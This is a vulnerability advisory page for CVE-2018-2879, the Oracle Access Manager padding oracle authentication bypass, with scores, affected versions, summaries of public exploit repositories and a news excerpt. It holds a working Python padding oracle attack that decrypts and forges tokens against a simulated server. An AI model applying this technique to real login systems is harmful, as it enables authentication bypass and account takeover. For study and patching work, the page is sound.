
CVE-2018-2879

Published: 19/04/2018 Updated: 03/10/2019
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
CVSS v3 Base Score: 9 | Impact Score: 6 | Exploitability Score: 2.2
VMScore: 606
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Authentication Engine). Supported versions that are affected are 11.1.2.3.0 and 12.2.1.3.0. This difficult-to-exploit vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. While the vulnerability is in Oracle Access Manager, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. Note: Please refer to My Oracle Support Note 2386496.1 (support.oracle.com/CSP/main/article?cmd=show&type=NOT&id=2386496.1) for instructions on how to address this issue. CVSS 3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H).

The underlying flaw, as described by SEC Consult and used by the public exploits listed below, is a padding oracle in the authentication engine: by repeatedly submitting modified encrypted data and observing whether the server's padding check passes, an attacker can construct authentication data that OAM accepts for any valid username, and so log in to any application protected by OAM without that user's credentials. Oracle rates the attack complexity as high (AC:H), but working exploit code has been public since May 2018, so the MOS note above should be applied to every affected instance.

Vulnerable Products

oracle access manager 11.1.2.3.0

oracle access manager 12.2.1.3.0

Github Repositories

Exploit for Oracle Access Manager padding oracle vulnerability (CVE-2018-2879)

Oracle Access Manager (OAM) Authentication Bypass Exploit. Introduction: Exploiting the Oracle Access Manager (OAM) padding oracle vulnerability (CVE-2018-2879) to perform authentication bypass and log in to any web app protected by OAM using a valid username. This exploit is based on the OAM padding oracle vulnerability discovered by SEC Consult and was tested on OAM v12.2.1.3.0 ww

Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit. Introduction: This exploit was developed during pentesting activity against Oracle OAM 11.1.2.3.0. It was developed based on the technical description by SEC Consult: www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/ Requirements: The exploit depends on python-pa

Multithreaded Padding Oracle Attack on Oracle OAM (CVE-2018-2879)

OAMBuster: Multithreaded Padding Oracle Attack on Oracle OAM (CVE-2018-2879). Authors: Red Timmy (Marco Ortisi, Stefan Broeder, Ahmad Mahfouz). Description: This multithreaded exploit was developed to greatly increase the speed of the attack as compared to the single-threaded version. For more information about the technical details of the attack, see this blog post by SEC Consult:
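All three repositories above rely on the same primitive: a server that reveals, through a distinguishable error, whether a decrypted message ended in valid padding. The following is an added example, not code from this page, from SEC Consult or from any of the linked repositories. It shows that primitive end to end against a simulated server: first recovering the plaintext of a captured token, then, which is what an authentication bypass needs, forging a token for a chosen plaintext without ever learning the key. The block cipher is a toy Feistel network standing in for AES so the script has no dependencies; the server, the key, the token contents and the field names are all constructed for the example, and OAM's real message format and endpoints are not modelled.

```python
# Padding oracle attack on CBC/PKCS#7, the bug class behind CVE-2018-2879.
# Added illustration, not code from this page, SEC Consult or the repositories above.
# The block cipher is a toy Feistel stand-in for AES (no dependencies); OAM's real
# message format, field names and endpoints are not modelled.
import hashlib
import hmac
import os

BLOCK, HALF = 16, 8
SERVER_KEY = os.urandom(32)  # known only to the simulated server

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):  # Feistel round function: keyed SHA-256 truncated to half a block
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:HALF]

def encrypt_block(key, block):
    l, r = block[:HALF], block[HALF:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def decrypt_block(key, block):
    l, r = block[:HALF], block[HALF:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, plaintext):
    """IV || C1 || ... || Cn: the shape of a token a server hands to a client."""
    prev, pt = os.urandom(BLOCK), pad(plaintext)
    out = [prev]
    for i in range(0, len(pt), BLOCK):
        prev = encrypt_block(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, data):
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    pt = b"".join(_xor(decrypt_block(key, c), p) for p, c in zip(blocks, blocks[1:]))
    return unpad(pt)  # distinguishable failure on bad padding: this is the oracle

def server_accepts_padding(data):
    """All the attacker ever gets back: did the padding check pass?"""
    try:
        cbc_decrypt(SERVER_KEY, data)
        return True
    except ValueError:
        return False

def recover_intermediate(oracle, target):
    """Recover D_k(target) byte by byte, at most 256 oracle queries per byte."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        x = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):  # pin the bytes already known to pad_val
            x[j] = inter[j] ^ pad_val
        for guess in range(256):
            x[pos] = guess
            if not oracle(bytes(x) + target):
                continue
            if pos == BLOCK - 1:  # 0x02 0x02 (or longer) can masquerade as 0x01:
                x[pos - 1] ^= 0xFF   # disturb the byte before; only a real 0x01 survives
                still_ok = oracle(bytes(x) + target)
                x[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ pad_val
            break
    return bytes(inter)

def attack_decrypt(oracle, data):
    """Read a captured token without the key; every block is independent of the others."""
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    pt = b"".join(_xor(recover_intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:]))
    return unpad(pt)

def attack_encrypt(oracle, plaintext):
    """Forge a token for chosen plaintext by building the CBC chain backwards."""
    pt, cur = pad(plaintext), os.urandom(BLOCK)  # the last ciphertext block is arbitrary
    out = [cur]
    for i in range(len(pt) - BLOCK, -1, -BLOCK):
        cur = _xor(recover_intermediate(oracle, cur), pt[i:i + BLOCK])  # previous block, finally the IV
        out.insert(0, cur)
    return b"".join(out)

def demo():
    token = cbc_encrypt(SERVER_KEY, b"user=alice;role=user")  # constructed sample token
    recovered = attack_decrypt(server_accepts_padding, token)
    forged = attack_encrypt(server_accepts_padding, b"user=admin;role=admin")
    return recovered, cbc_decrypt(SERVER_KEY, forged)  # what the server would now trust

if __name__ == "__main__":
    print(demo())
```

demo() returns the plaintext read out of the captured token and the plaintext the server obtains from the forged one; the attacker never touches SERVER_KEY. Two details matter in practice. The extra check on the last byte prevents an ending of 0x02 0x02 (or longer) from being mistaken for 0x01, a classic source of wrong bytes in naive implementations. And because each intermediate block in attack_decrypt is recovered independently, the queries for different blocks can run concurrently, which is why a padding oracle exploit can be made multithreaded; forging, by contrast, has to proceed backwards one block at a time because each recovered block becomes the next ciphertext to attack.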

Recent Articles

Oracle Access Manager is a terrible doorman: Get patching this bug
The Register • Shaun Nichols in San Francisco • 03 May 2018

Security tool can be gamed to let any old riffraff into data

A security vulnerability in Oracle Access Manager leaves the network authentication tool leaning more toward "access" than "manager." The flaw, classified as CVE-2018-2879, can be exploited by a remote attacker to bypass an Oracle Access Manager (OAM) authentication screen and, in the process, take over the account of any user or administrator on a vulnerable system. Designed to manage remote connections to cloud and mobile apps via a single sign-on page, with multi-factor authentication, OAM is...